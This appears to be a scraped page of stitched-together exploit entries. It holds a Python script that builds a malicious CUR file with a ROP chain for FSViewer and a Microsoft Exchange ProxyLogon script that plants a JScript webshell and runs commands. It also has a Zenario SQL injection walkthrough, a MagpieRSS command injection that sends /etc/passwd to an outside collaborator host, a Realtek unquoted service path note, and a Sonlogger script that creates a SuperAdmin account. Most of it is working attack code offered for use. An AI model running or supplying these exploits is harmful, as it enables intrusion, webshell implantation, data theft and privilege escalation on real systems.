Cur File Format # --------------------------------------------------------------------------------- # | Reserved | Type | Image Count | # | 00 00 | 02 00 | 02 00 | <- CUR file will contains two images # Entries: # | Width | Height | ColorCount | Reserved | XHotSpot | YHotSpot | SizeInBytes | File Offset | # | 30 | 30 | 00 | 00 | 01 00 | 02 00 | 30 03 00 00 | 26 00 00 00 | <- we'll corrupt the first image with rop chain & shellcode # | 20 | 20 | 00 | 00 | 02 00 | 04 00 | E8 02 00 00 | 56 03 00 00 | <- while leaving the 2nd one "untouched" a part from the stack pivot (should leave the cursor preview intact) # 1st Image Info Header: # | Size | Width | Height | Planes | BitCount | Compression | ImageSize | XpixelsPerM | YpixelsPerM | Colors Used | ColorsImportant | # | 28 00 00 00 | 30 00 00 00 | 60 00 00 00 | 01 00 | 89 30 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | # 1st ImageData(BLOB) # 2nd Image Info Header: # 2nd ImageData(BLOB) # --------------------------------------------------------------------------------- # BitCount will be used to read # number of bytes into a buffer triggering the buffer overflow # its value can be modified but we need to account for two operations happening into the software. # - SHL 1, 89 = 0x200 # - SHL 200, 2 = 0x800 (2048d) number of bytes to be read from the file # we'll have to pad the image data to match it's size in bytes defined in the header SizeInBytes # ImageData = SizeInBytes - ImageInfoHeader Size (330h-28h=308h 776d) ################################################################################### image_data_pad = 776 def create_rop_nop(): rop_gadgets = [ 0x6adc5ab6, # 0x6adc5ab6 (RVA : 0x00045ab6) : # DEC ECX # RETN ** [fsplugin05.dll] ** | {PAGE_EXECUTE_READ} ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) def create_rop_chain(): rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x00405bd4, # POP EAX ; RETN [FSViewer.exe] 0x6adf4160, # ptr to &VirtualProtect() [IAT fsplugin05.dll] 0x008b3977, # MOV EAX,DWORD PTR DS:[EAX] ; RETN [FSViewer.exe] 0x0083f67a, # XCHG EAX,ESI ; RETN [FSViewer.exe] #[---INFO:gadgets_to_set_ebp:---] 0x005b35b8, # POP EBP ; RETN [FSViewer.exe] 0x00454521, # & jmp esp [FSViewer.exe] #[---INFO:gadgets_to_set_ebx:---] 0x00630472, # POP EBX ; RETN [FSViewer.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x004798db, # POP EDX ; RETN [FSViewer.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x004c7832, # POP ECX ; RETN [FSViewer.exe] 0x00991445, # &Writable location [FSViewer.exe] #[---INFO:gadgets_to_set_edi:---] 0x0040c3a8, # POP EDI ; RETN [FSViewer.exe] 0x0057660b, # RETN (ROP NOP) [FSViewer.exe] #[---INFO:gadgets_to_set_eax:---] 0x00404243, # POP EAX ; RETN [FSViewer.exe] 0x90909090, # nop #[---INFO:pushad:---] 0x6adc21bf, # PUSHAD # RETN [fsplugin05.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) # Cur image = 1597 bytes ################################################################################### cur_Signature = "\x00\x00\x02\x00\x02\x00" # | Reserved | Type | Image Count | cur_Entries = ( "\x30\x30\x00\x00\x01\x00\x02\x00\x30\x03\x00\x00\x26\x00\x00\x00" # 1st Entry "\x20\x20\x00\x00\x02\x00\x04\x00\xE8\x02\x00\x00\x56\x03\x00\x00" # 2nd Entry ) # 1st Image Info Header cur_1InfoHeader = "\x28\x00\x00\x00\x30\x00\x00\x00\x60\x00\x00\x00\x01\x00\x89\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 1st ImageData # cur_1ImageData_orig = "\x00\x00\x00\x00\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xC0\x00\x00\x00\x00\x00\x00\x08\x20\x00\x00\x00\x00\x00\x00\x08\x20\x00\x00\x00\x00\x00\x00\x10\x40\x00\x00\x00\x00\x00\x00\x10\x40\x00\x00\x00\x00\x00\x00\x20\x80\x00\x00\x00\x00\x00\x00\x20\x80\x00\x00\x00\x00\x00\x80\x41\x00\x1F\x80\x00\x00\x00\xC0\x41\x00\x3F\xC0\x00\x00\x00\xA0\x82\x00\x3F\xC0\x00\x00\x00\x90\x82\x00\x1F\x80\x00\x00\x00\x89\x04\x00\x00\x00\x00\x00\x00\x85\x04\x00\x1F\x80\x00\x00\x00\x82\x08\x00\x1F\x80\x00\x00\x00\x80\x0F\xFE\x1F\x80\x00\x00\x00\x80\x00\x04\x1F\x80\x00\x00\x00\x80\x00\x08\x0F\x80\x00\x00\x00\x80\x00\x10\x07\xC0\x00\x00\x00\x80\x00\x20\x03\xE0\x00\x00\x00\x80\x00\x47\xC1\xF0\x00\x00\x00\x80\x00\x87\xC1\xF8\x00\x00\x00\x80\x01\x07\xC1\xFC\x00\x00\x00\x80\x02\x07\xC1\xFC\x00\x00\x00\x80\x04\x07\xC1\xFC\x00\x00\x00\x80\x08\x07\xC1\xFC\x00\x00\x00\x80\x10\x07\xE3\xFC\x00\x00\x00\x80\x20\x03\xFF\xF8\x00\x00\x00\x80\x40\x01\xFF\xF0\x00\x00\x00\x80\x80\x00\xFF\xE0\x00\x00\x00\x81\x00\x00\x00\x00\x00\x00\x00\x82\x00\x00\x00\x00\x00\x00\x00\x84\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00\xA0\x00\x00\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xF8\x3F\xFF\xFF\xFF\x00\x00\xFF\xF0\x1F\xFF\xFF\xFF\x00\x00\xFF\xF0\x1F\xFF\xFF\xFF\x00\x00\xFF\xE0\x3F\xFF\xFF\xFF\x00\x00\xFF\xE0\x3F\xFF\xFF\xFF\x00\x00\xFF\xC0\x7F\xFF\xFF\xFF\x00\x00\xFF\xC0\x7F\xE0\x7F\xFF\x00\x00\x7F\x80\xFF\xC0\x3F\xFF\x00\x00\x3F\x80\xFF\x80\x1F\xFF\x00\x00\x1F\x01\xFF\x80\x1F\xFF\x00\x00\x0F\x01\xFF\xC0\x3F\xFF\x00\x00\x06\x03\xFF\xE0\x7F\xFF\x00\x00\x02\x03\xFF\xC0\x3F\xFF\x00\x00\x00\x07\xFF\xC0\x3F\xFF\x00\x00\x00\x00\x01\xC0\x3F\xFF\x00\x00\x00\x00\x03\xC0\x3F\xFF\x00\x00\x00\x00\x07\xE0\x3F\xFF\x00\x00\x00\x00\x0F\xF0\x1F\xFF\x00\x00\x00\x00\x10\x18\x0F\xFF\x00\x00\x00\x00\x30\x1C\x07\xFF\x00\x00\x00\x00\x70\x1C\x03\xFF\x00\x00\x00\x00\xF0\x1C\x01\xFF\x00\x00\x00\x01\xF0\x1C\x01\xFF\x00\x00\x00\x03\xF0\x1C\x01\xFF\x00\x00\x00\x07\xF0\x1C\x01\xFF\x00\x00\x00\x0F\xF0\x00\x01\xFF\x00\x00\x00\x1F\xF8\x00\x03\xFF\x00\x00\x00\x3F\xFC\x00\x07\xFF\x00\x00\x00\x7F\xFE\x00\x0F\xFF\x00\x00\x00\xFF\xFF\x00\x1F\xFF\x00\x00\x01\xFF\xFF\xFF\xFF\xFF\x00\x00\x03\xFF\xFF\xFF\xFF\xFF\x00\x00\x07\xFF\xFF\xFF\xFF\xFF\x00\x00\x0F\xFF\xFF\xFF\xFF\xFF\x00\x00\x1F\xFF\xFF\xFF\xFF\xFF\x00\x00\x3F\xFF\xFF\xFF\xFF\xFF\x00\x00\x7F\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00" print("Generating 1st ImageData BLOB:") cur_1ImageData = "" cur_1ImageData += create_rop_nop() * ( (1560 - 1416 ) / 4 ) # 1560 stack pivot - 1416 where our cyclic pattern has been found print("- ROP NOP:\t\t{}".format(len(cur_1ImageData))) cur_1ImageData += create_rop_chain() print("- ROP Chain:\t\t{}".format(len(create_rop_chain()))) cur_1ImageData += "\x81\xC4\x44\xFD\xFF\xFF\x90\x90" # stack adjustment for meterpreter GetPC routine: add esp, -700 print("- Stack Adjustment:\t8") cur_1ImageData += shellcode print("- Shellcode:\t\t{}".format(len(shellcode))) cur_1ImageData += "A" * (image_data_pad - len(cur_1ImageData)) # 2nd Image Info Header cur_2InfoHeader = "\x28\x00\x00\x00\x20\x00\x00\x00\x40\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 2nd ImageData (if this does not trigger the stack pivot it should be changed removing the beginning \x00 byte of cur_2ImageData2 and adding it back at the end of cur_2ImageData section) cur_2ImageData = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80\x00\x80\x80\x00\x00\xC0\xC0\xC0\x00\x80\x80\x80\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF\xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x1F\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x1F\x00\x0F\x11\x11\x11\x10\x00\x11\x11\x11\x11\x11\x11\x11\x11\x1F\x00\x0F\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF1\x11\x11\xF0\x00\xF1\x11\x11\x10\xFF\xFF\xF0\x11\x11\x11\x11\xFF\x11\x11\xF0\x00\xF1\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\xF1\x1F\x00\x0F\x11\x11\x11\x11\x10\x00\x11\x11\x11\x11\x11\xF0\x0F\x1F\x00\x0F\x11\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\xF0\x00\xF1\x11\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\x00\x00\xFF\xFF\xFF\xF1\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\x00\x00\x00\x00\x0F\x11\x11\x10\xFF\xF0\x11\x11\x11\x11\xF0\x00\x00\x00\x00\x00\xF1\x00\x00\x01\x0F\xFF\x01\x11\x11\x11\xF0\x00\x00\x00\x00\x0F\x11\x0F\xFF\x01\x10\xFF\xF0\x11\x11\x11\xF0\x00\x00\x00\x00\xF1\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00\x00\x0F\x11\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00\x00\xF1\x11\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00" # SEH record overwrite goes here cur_2ImageData2 = "\x00\xFF\xF0\x0F\xFF\xF0\x11\x11\x11\xF0\x00\x00\xF1\x11\x11\x11\x11\x0F\xFF\xFF\xFF\x01\x11\x11\x11\xF0\x00\x0F\x11\x11\x11\x11\x11\x10\x00\x00\x00\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x0F\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xE3\xFF\xFF\xFF\xC1\xFF\xFF\xFF\xC1\xFF\xFF\xFF\x83\xF8\xFF\xFF\x83\xF0\x7F\xDF\x07\xE0\x3F\xCF\x07\xF0\x7F\xC6\x0F\xF8\xFF\xC2\x0F\xF0\x7F\xC0\x1F\xF0\x7F\xC0\x00\x70\x7F\xC0\x00\xF8\x3F\xC0\x01\x04\x1F\xC0\x03\x06\x0F\xC0\x07\x06\x07\xC0\x0F\x06\x07\xC0\x1F\x06\x07\xC0\x3F\x80\x0F\xC0\x7F\xC0\x1F\xC0\xFF\xE0\x3F\xC1\xFF\xFF\xFF\xC3\xFF\xFF\xFF\xC7\xFF\xFF\xFF\xCF\xFF\xFF\xFF\xDF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" ################################################################################### buf = "" buf += cur_Signature buf += cur_Entries buf += cur_1InfoHeader buf += cur_1ImageData buf += cur_2InfoHeader buf += cur_2ImageData # buf += struct.pack('<I',0x004023da) # SEH pop ecx ; pop ebp ; ret | startnull {PAGE_EXECUTE_READ} [FSViewer.exe] # 0x0019dc10 : Pointer into normal cyclic pattern at ESP+0x588 (+1416) : 0x0019dc48 : offset 1, length 775 buf += struct.pack('<I',0x6adad2ff) # stack pivot 1560 / 0x618 : ADD ESP,608 ; POP EBX ; POP ESI ; POP EDI ; POP EBP ; RETN ** [fsplugin05.dll] ** | {PAGE_EXECUTE_READ} buf += cur_2ImageData2 #buf += "B" * (buf_max_size - len(buf)) print("\nWriting CUR File:") print("--------------------------------------------------------") print("- Signature + ImageCount:\t{}".format(len(cur_Signature))) print("- Entries 2/2:\t\t\t{}".format(len(cur_Entries))) print("- 1st InfoHeader:\t\t{}".format(len(cur_1InfoHeader))) print("- 1st ImageData:\t\t{}".format(len(cur_1ImageData))) print("- 2nd InfoHeader:\t\t{}".format(len(cur_2InfoHeader))) print(" 2nd ImageData 1/2:\t{}".format(len(cur_2ImageData))) print(" SEH:\t\t\t4") print(" 2nd ImageData 2/2:\t{}".format(len(cur_2ImageData2))) print("- 2nd ImageData TOT:\t\t{}".format(len(cur_2ImageData)+4+len(cur_2ImageData2))) print("--------------------------------------------------------") print("[+] Writing total {} bytes on {}".format(len(buf), filename)) file = open(filename, "w"); file.write(buf); file.close();
HireHackking

Microsoft Exchange 2019 - Server-Side Request Forgery

HACKER · %s · %s

import requests from urllib3.exceptions import InsecureRequestWarning import random import string import sys def id_generator(size=6, chars=string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) if len(sys.argv) < 2: print("使用方式: python PoC.py <target> <email>") print("使用方式: python PoC.py mail.btwaf.cn test2@btwaf.cn") exit() proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) target = sys.argv[1] email = sys.argv[2] random_name = id_generator(4) + ".js" user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx" shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path # webshell-马子内容 shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["code"],"unsafe");}</script>' autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> """ % email print("正在获取Exchange Server " + target+"权限") print("=============================") FQDN = "EXCHANGE01" ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522", "User-Agent": user_agent}, verify=False,proxies=proxies) if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers: FQDN = ct.headers["X-FEServer"] ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "User-Agent": user_agent}, data=autoDiscoverBody, proxies=proxies, verify=False ) if ct.status_code != 200: print(ct.status_code) print("Autodiscover Error!") exit() if "<LegacyDN>" not in str(ct.content): print("Can not get LegacyDN!") exit() legacyDn = str(ct.content).split("<LegacyDN>")[1].split(r"</LegacyDN>")[0] print("Got DN: " + legacyDn) mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00" ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN, "Content-Type": "application/mapi-http", "X-Requesttype": "Connect", "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}", "X-Clientapplication": "Outlook/15.0.4815.1002", "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456", "User-Agent": user_agent }, data=mapi_body, verify=False, proxies=proxies ) if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content): print("Mapi Error!") exit() sid = str(ct.content).split("with SID ")[1].split(" and MasterAccountSid")[0] print("Got SID: " + sid) sid = sid.replace(sid.split("-")[-1],"500") proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r> """ % sid ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "msExchLogonMailbox": "S-1-5-20", "User-Agent": user_agent }, data=proxyLogon_request, proxies=proxies, verify=False ) if ct.status_code != 241 or not "set-cookie" in ct.headers: print("Proxylogon Error!") exit() sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0] msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0] print("Got session id: " + sess_id) print("Got canary: " + msExchEcpCanary) ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; ", "msExchLogonMailbox": "S-1-5-20", "User-Agent": user_agent }, json={"filter": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}}, verify=False ) if ct.status_code != 200: print("GetOAB Error!") exit() oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0] print("Got OAB id: " + oabId) oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "ExternalUrl": "http://ffff/#%s" % shell_content}}} ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "msExchLogonMailbox": "S-1-5-20", "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=oab_json, verify=False ) if ct.status_code != 200: print("Set external url Error!") exit() reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": shell_absolute_path}}} ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "msExchLogonMailbox": "S-1-5-20", "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=reset_oab_body, verify=False ) if ct.status_code != 200: print("写入shell失败了啊") exit() print("成功了。马上就验证shell是否OK!") print("POST shell:https://"+target+"/owa/auth/test11.aspx") shell_url="https://"+target+"/owa/auth/test11.aspx" print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());') print("正在请求shell") data=requests.post(shell_url,data={"code":"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"},verify=False) if data.status_code != 200: print("写入shell失败") else: print("权限如下:"+data.text.split("OAB (Default Web Site)")[0].replace("Name : ",""))
HireHackking

Zenario CMS 8.8.53370 - 'id' Blind SQL Injection

HACKER · %s · %s

# Exploit Title: Zenario CMS 8.8.53370 - 'id' Blind SQL Injection # Date: 05/02/2021 # Exploit Author: Balaji Ayyasamy # Vendor Homepage: https://zenar.io/ # Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8 # Version: 8.8.53370 # Tested on: Windows 10 Pro 19041 (x64_86) + XAMPP 7.4.14 # CVE: CVE-2021-26830 # Reference - https://edhunter484.medium.com/blind-sql-injection-on-zenario-cms-b58b6820c32d Step 1 - Login to the zenario cms with admin credentials. Step 2 - Go to modules and select plugin library. Step 3 - Select any plugin and press delete button. Copy the delete request and send it to the sqlmap. Command - sqlmap -r request.txt -p id
HireHackking

MagpieRSS 0.72 - 'url' Command Injection

HACKER · %s · %s

# Exploit Title: MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery # Date: 24 March 2021 # Exploit Author: bl4ckh4ck5 # Vendor Homepage: http://magpierss.sourceforge.net/ # Software Link: https://sourceforge.net/projects/magpierss/files/magpierss/magpierss-0.72/magpierss-0.72.tar.gz/download # Version: MagpieRSS 0.72 and maybe older once aswell. # Tested on: Linux debian buster with default apache install. In MagpieRSS 0.72 on the /scripts/magpie_debug.php?url=testtest and /scripts/magpie_simple.php page i noticed there was a command injection in the RSS URL field when you send a https url and click the Parse RSS button. if you would send "https://www.example.com? -o /var/www/html/testtest.php" as input it would save the url output to the testtest.php file directly in the /var/www/html/ folder. the "?" is importent or it won't work. it is also possible to read any file if you send it like this "https://zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net? --data '@/etc/passwd'" then the page "zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net" would receive as POST data the /etc/passwd file. Outside of that because it uses the curl request directly from the prompt it is not restricted and it is possible to request internal pages like 127.0.0.1 however it is restricted to https requests only, but you can partionaly work arround that by sending the url like this "https://www.example.com? http://localhost/server-status/" then it also can send it to a http domain however then it is blind ssrf but on https domains you can make it vissable by first saving it to a file and if you can't write in the /var/www/html folder you sometimes can write it to the /tmp/testtest.txt and use "https://www.example.com? --data '@/tmp/testtest.txt'" to retrieve that file. The problem occures in the file /extlib/Snoopy.class.inc on line 660: https://github.com/kellan/magpierss/blob/04d2a88b97fdba5813d01dc0d56c772d97360bb5/extlib/Snoopy.class.inc#L660 On that page there they use a escapeshellcmd command to escape the https url however they didn't put it between quotes. so it's possible to add a "-" to this and rewrite the curl command on the /scripts/magpie_debug.php and /scripts/magpie_simple.php page. from there on you can esculate it to Server side request forgery or Code injection. It mostlickly affects most versions but i have only tested it on version 0.72.
HireHackking
# Exploit Title: Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2021-03-14 # Vendor Homepage: https://www.realtek.com/en/ # Tested Version: 700.1631 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Realtek" | findstr /i /v """ Realtek11nSU Realtek11nSU C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtlService.exe Auto # Service info: C:\>sc qc "Realtek11nSU" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Realtek11nSU TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtlService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Realtek11nSU DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking
# Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure # Date: 04-02-2021 # Exploit Author: Berkan Er # Vendor Homepage: https://www.sonlogger.com/ # Version: 4.2.3.3 # Tested on: Windows 10 Enterprise x64 Version 1803 # A remote attacker can be create an user with SuperAdmin profile #!/usr/bin/python3 import argparse import string import sys from random import random import requests import json banner = ''' Sonlogger Log and Report System - v4.2.3.3 Remote SuperAdmin Account Creation Vulnerability / Information Disclosure Berkan Er <b3rsec@protonmail.com> @erberkan ''' commonHeaders = { 'Content-type': 'application/json', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest' } def get_random_string(): res = ''.join(random.choices(string.ascii_lowercase, k=8)) print(res) return str(res) def getProductInfo(host, port, flag): response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo', data={}, headers=commonHeaders) print("[*] Status code: ", response.status_code) print("[*] Product Version: ", response.json()['Version']) info_json = json.dumps(response.json(), indent=2) response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders) user_json = json.dumps(response_1.json(), indent=2) if flag: print("\n*** Product Infos=\n" + info_json) print("\n*** Users=\n" + user_json) if response.json()['Version'] == '4.2.3.3': print("[+] It seems vulnerable !") return True else: print("[!] It doesn't vulnerable !") return False def createSuperAdmin(host, port): payload = '''{ '_profilename':'superadmin_profile', '_username':'_hacker', '_password':'_hacker', '_fullname':'', '_email':'' }''' response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders) print("[*] STAUTS CODE:", response.status_code) print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker") response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders) json_formatted_str = json.dumps(response_1.json(), indent=2) print("\n*** Users=\n" + json_formatted_str) def main(): print(banner) try: host = sys.argv[1] port = sys.argv[2] action = sys.argv[3] if action == 'TRUE': if getProductInfo(host, port, False): createSuperAdmin(host, port) else: getProductInfo(host, port, True) print("KTHNXBYE!") except: print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP " "Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product " "Infos") print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n") if __name__ == "__main__": main()
HireHackking
